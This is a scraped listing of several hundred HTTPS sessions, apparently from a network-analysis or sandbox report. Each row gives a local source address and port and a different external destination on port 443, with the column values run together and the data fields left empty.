                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17751192.168.2.144364264.245.231.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17752192.168.2.1459164173.50.105.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17753192.168.2.1435474109.239.150.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17754192.168.2.14499705.50.187.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17755192.168.2.144109417.237.112.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17756192.168.2.145158678.130.63.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17757192.168.2.1460364207.37.230.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17758192.168.2.1449654175.100.142.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17759192.168.2.1443162184.122.109.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17760192.168.2.144425679.10.164.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17761192.168.2.1436660197.241.183.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17762192.168.2.1442998216.229.159.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17763192.168.2.144869286.186.201.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17764192.168.2.143354645.115.93.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17765192.168.2.146011646.8.131.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17766192.168.2.145416839.139.22.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17767192.168.2.145302066.88.13.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17768192.168.2.1459148101.142.69.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17769192.168.2.143458477.26.251.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17770192.168.2.1433138205.206.123.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17771192.168.2.1460534161.78.184.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17772192.168.2.1442566148.209.44.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17773192.168.2.1441688159.176.15.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17774192.168.2.144458494.197.230.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17775192.168.2.1447094171.2.52.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17776192.168.2.1451714200.77.180.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17777192.168.2.144507691.231.26.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17778192.168.2.1435204138.249.150.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17779192.168.2.143953698.105.79.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17780192.168.2.1445732128.194.84.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17781192.168.2.1456462161.180.2.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17782192.168.2.145539685.6.202.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17783192.168.2.145981819.118.177.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17784192.168.2.1453398150.53.21.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17785192.168.2.1442670104.94.119.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17786192.168.2.1441504181.93.151.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17787192.168.2.1438694143.119.168.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17788192.168.2.145933287.153.225.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17789192.168.2.144543098.252.53.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17790192.168.2.14598969.115.207.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17791192.168.2.143349046.184.180.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17792192.168.2.1447318102.37.252.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17793192.168.2.144729234.203.15.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17794192.168.2.1455832134.232.40.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17795192.168.2.144279677.208.213.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17796192.168.2.145638894.35.185.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17797192.168.2.144010496.92.158.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17798192.168.2.144814892.239.10.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17799192.168.2.143629450.45.225.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17800192.168.2.144367083.209.247.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17801192.168.2.1460054191.231.227.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17802192.168.2.145228243.214.30.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17803192.168.2.1435522171.49.57.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17804192.168.2.1436864154.158.32.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17805192.168.2.145566465.161.218.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17806192.168.2.1441538101.177.210.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17807192.168.2.1456154200.225.97.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17808192.168.2.1453340205.7.131.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17809192.168.2.145879234.89.67.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17810192.168.2.1435572198.64.26.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17811192.168.2.145789063.223.124.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17812192.168.2.1454256119.154.226.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17813192.168.2.145127292.140.148.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17814192.168.2.1436040106.163.90.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17815192.168.2.1460866155.107.109.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17816192.168.2.1450840154.238.16.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17817192.168.2.144869440.59.122.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17818192.168.2.1458532128.76.90.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17819192.168.2.145396275.235.247.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17820192.168.2.1438154173.34.163.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17821192.168.2.145990095.194.214.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17822192.168.2.1435764208.185.57.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17823192.168.2.144135666.58.54.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17824192.168.2.1454548133.4.159.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17825192.168.2.145779023.89.168.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17826192.168.2.1447546179.254.97.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17827192.168.2.144490062.28.140.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17828192.168.2.1438288110.202.105.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17829192.168.2.1436258100.19.191.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17830192.168.2.1457632187.185.28.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17831192.168.2.1451198138.47.167.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17832192.168.2.1449760121.221.21.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17833192.168.2.1445452167.36.27.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17834192.168.2.14531464.136.181.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17835192.168.2.1438612179.195.213.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17836192.168.2.1454082205.40.84.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17837192.168.2.1438878116.34.184.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17838192.168.2.144319871.105.254.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17839192.168.2.145039045.170.248.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17840192.168.2.1440154203.84.56.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17841192.168.2.1442002194.250.142.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17842192.168.2.145497667.45.195.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17843192.168.2.1457006204.187.143.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17844192.168.2.1456618189.234.236.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17845192.168.2.145170094.131.243.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17846192.168.2.145018637.72.195.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17847192.168.2.1450804148.120.119.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17848192.168.2.1455106130.136.141.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17849192.168.2.145771882.32.167.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17850192.168.2.1456356183.152.202.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17851192.168.2.1443136128.205.255.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17852192.168.2.1435190152.198.193.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17853192.168.2.1452456105.61.7.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17854192.168.2.144875267.75.151.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17855192.168.2.1443958210.182.173.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17856192.168.2.143976479.9.198.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17857192.168.2.1443176133.22.30.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17858192.168.2.1438874200.193.80.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17859192.168.2.1454512109.123.175.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17860192.168.2.1448928148.175.223.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17861192.168.2.1446444171.172.102.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17862192.168.2.1459818133.110.11.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17863192.168.2.143628499.101.203.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17864192.168.2.1439490196.221.143.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17865192.168.2.145574213.217.172.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17866192.168.2.1443044163.47.85.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17867192.168.2.14418884.226.54.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17868192.168.2.1459828201.88.211.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17869192.168.2.1435878195.190.73.46443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17870192.168.2.144243419.49.241.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17871192.168.2.1443812154.183.148.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17872192.168.2.144548465.74.163.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17873192.168.2.144240450.146.69.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17874192.168.2.145998260.191.63.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17875192.168.2.1443446151.96.40.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17876192.168.2.145758096.187.49.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17877192.168.2.1450018166.70.201.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17878192.168.2.1459066192.93.97.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17879192.168.2.1458260119.253.151.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17880192.168.2.145763263.242.235.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17881192.168.2.1437226103.135.18.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17882192.168.2.1457000193.95.51.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17883192.168.2.1441158139.136.39.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17884192.168.2.1451836200.46.153.157443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17885192.168.2.144846495.34.226.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17886192.168.2.143797497.145.158.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17887192.168.2.145435440.81.129.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17888192.168.2.14424465.178.107.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17889192.168.2.1457346104.13.198.208443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17890192.168.2.143802059.55.104.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17891192.168.2.1451996153.221.248.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17892192.168.2.1453714218.35.146.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17893192.168.2.1436888222.215.130.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17894192.168.2.1449652145.124.71.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17895192.168.2.143816287.61.77.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17896192.168.2.1440814125.6.7.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17897192.168.2.1440830157.110.153.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17898192.168.2.1436814134.129.84.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17899192.168.2.1454048178.237.181.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17900192.168.2.145791298.59.199.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17901192.168.2.144950834.140.231.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17902192.168.2.144050645.234.140.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17903192.168.2.1437458177.17.110.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17904192.168.2.145013063.50.233.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17905192.168.2.1447080119.92.188.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17906192.168.2.1433820143.30.54.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17907192.168.2.1432942196.211.100.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17908192.168.2.143506284.55.179.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17909192.168.2.144965627.37.223.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17910192.168.2.1448764179.238.88.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17911192.168.2.1445330151.6.219.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17912192.168.2.14353328.4.36.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17913192.168.2.1458252190.155.143.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17914192.168.2.1433168108.175.161.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17915192.168.2.1449048159.3.194.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17916192.168.2.14524404.178.244.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17917192.168.2.1443360205.232.58.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17918192.168.2.1439638182.229.39.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17919192.168.2.1454820121.173.189.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17920192.168.2.144174219.253.217.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17921192.168.2.1441906157.66.141.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17922192.168.2.1445752105.122.129.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17923192.168.2.1441678122.47.242.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17924192.168.2.1460606223.197.160.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17925192.168.2.1449810107.70.202.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17926192.168.2.1442944119.42.115.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17927192.168.2.1442128162.243.66.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17928192.168.2.145730261.50.44.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17929192.168.2.1437282177.229.190.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17930192.168.2.1448580169.93.193.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17931192.168.2.1459964113.171.127.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17932192.168.2.1457804158.138.156.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17933192.168.2.1452402135.114.38.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17934192.168.2.1457844109.78.176.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17935192.168.2.1443556199.140.50.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17936192.168.2.144223289.137.240.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17937192.168.2.1448770174.129.164.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17938192.168.2.1455108166.183.13.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17939192.168.2.144941631.180.208.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17940192.168.2.145701457.230.11.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17941192.168.2.1442978190.146.82.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17942192.168.2.1438226122.10.190.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17943192.168.2.1451650138.170.249.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17944192.168.2.1458518175.223.115.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17945192.168.2.1457918170.210.38.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17946192.168.2.1450610211.180.40.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17947192.168.2.1453154198.252.127.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17948192.168.2.145125669.46.8.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17949192.168.2.1440864128.3.130.22443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17950192.168.2.144061831.21.140.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17951192.168.2.143496038.174.115.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17952192.168.2.1459606172.204.35.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17953192.168.2.144480886.155.164.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17954192.168.2.1443416212.23.115.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17955192.168.2.145383218.71.56.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17956192.168.2.1441298158.226.176.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17957192.168.2.143865251.5.202.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17958192.168.2.1444534166.128.168.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17959192.168.2.1452300133.124.207.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17960192.168.2.144104297.19.206.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17961192.168.2.1438352199.46.87.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17962192.168.2.1442402190.173.210.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17963192.168.2.1447092223.103.194.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17964192.168.2.144666468.60.4.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17965192.168.2.143804293.7.143.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17966192.168.2.14422901.58.146.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17967192.168.2.145719045.6.103.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17968192.168.2.1433830156.54.46.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17969192.168.2.1443026150.202.12.22443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17970192.168.2.1445792122.150.31.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17971192.168.2.1435646208.154.134.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
